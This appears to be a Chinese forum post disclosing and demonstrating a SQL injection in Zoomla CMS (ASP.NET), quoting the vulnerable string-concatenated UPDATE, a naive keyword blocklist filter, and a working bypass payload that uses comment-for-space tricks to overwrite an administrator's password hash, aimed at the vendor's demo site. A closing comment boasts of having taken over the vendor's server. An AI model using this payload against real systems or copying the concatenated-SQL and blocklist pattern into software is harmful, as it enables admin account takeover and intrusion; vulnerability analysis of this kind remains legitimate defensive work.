逐浪CMS通用型SQL注入漏洞分析与利用(asp.net)

90_

显示不全请点击全屏阅读
绕过了那个很简单的防注入。直接可以update管理员密码。

注入点：

http://demo.zoomla.cn/user/cashcoupon/arrivejihuo.aspx

页面的按钮点击事件：

1. 
   
2. protected void Btn_Click调用了b_Arrive.UpdateState(text);
   
3. public bool UpdateState(string ArriveNo)
   
4. {
   
5. string sqlStr = "Update ZL_Arrive SET State =1 WHERE ArriveNO='" + ArriveNo + "'";  ///果断注入
   
6. return SqlHelper.ExecuteSql(sqlStr);
   
7. }
   

复制代码

Page_Load方法里面有调用到了一个函数：
DataSecurity.StartProcessRequest();

上面这个函数具体是这样的：

1. 
   
2. public static void StartProcessRequest()
   
3. {
   
4. try
   
5. {
   
6. if (HttpContext.Current.Request.QueryString != null)
   
7. {
   
8. for (int i = 0; i < HttpContext.Current.Request.QueryString.Count; i++)
   
9. {
   
10. string getkeys = HttpContext.Current.Request.QueryString.Keys[i];
    
11. if (!DataSecurity.ProcessSqlStr(HttpContext.Current.Request.QueryString[getkeys]))
    
12. {
    
13. function.WriteErrMsg("数据不能包含SQL注入代码!");
    
14. HttpContext.Current.Response.End();
    
15. }
    
16. }
    
17. }
    
18. if (HttpContext.Current.Request.Form != null)
    
19. {
    
20. for (int j = 0; j < HttpContext.Current.Request.Form.Count; j++)
    
21. {
    
22. string getkeys = HttpContext.Current.Request.Form.Keys[j];
    
23. if (!DataSecurity.ProcessSqlStr(HttpContext.Current.Request.Form[getkeys]))
    
24. {
    
25. function.WriteErrMsg("数据不能包含SQL注入代码!");
    
26. HttpContext.Current.Response.End();
    
27. }
    
28. }
    
29. }
    
30. }
    
31. ……
    
32. }

复制代码

里面还调用到一个DataSecurity.ProcessSqlStr

1. 
   
2. public static bool ProcessSqlStr(string Str)
   
3. {
   
4. bool ReturnValue = true;
   
5. Str = Str.ToLower();
   
6. try
   
7. {
   
8. if (Str != "")
   
9. {
   
10. string SqlStr = "and |exec |insert |select |delete |update |count |chr |mid |master |truncate |char |declare ";
    
11. string[] anySqlStr = SqlStr.Split(new char[]
    
12. {
    
13. '|'
    
14. });
    
15. string[] array = anySqlStr;
    
16. for (int i = 0; i < array.Length; i++)
    
17. {
    
18. string ss = array[i];
    
19. if (Str.IndexOf(ss) >= 0)
    
20. {
    
21. ReturnValue = false;
    
22. }
    
23. }
    
24. }
    
25. }
    
26. catch
    
27. {
    
28. ReturnValue = false;
    
29. }
    
30. return ReturnValue;
    
31. }
    

复制代码

对于变量

string SqlStr = “and |exec |insert |select |delete |update |count |chr |mid
|master |truncate |char |declare “;
里面的特征字符串，仅仅是做了一个很简单的匹配，很容易绕过，看例子：
在页面正常输入东西：
image019.png
提交的时候截断一下，改下优惠券编号的代码，如下：

1. 
   
2. 1′;update/**/zl_manager set
   
3. adminpassword=’c4ca4238a0b923820dcc509a6f75849b’ where
   
4. adminname=’testuser’–

复制代码

执行前管理密码是这样的：


表明注入成功。
作者：wefgod

HUC-逍遥

  这个逐浪之前我拿到过他的服务器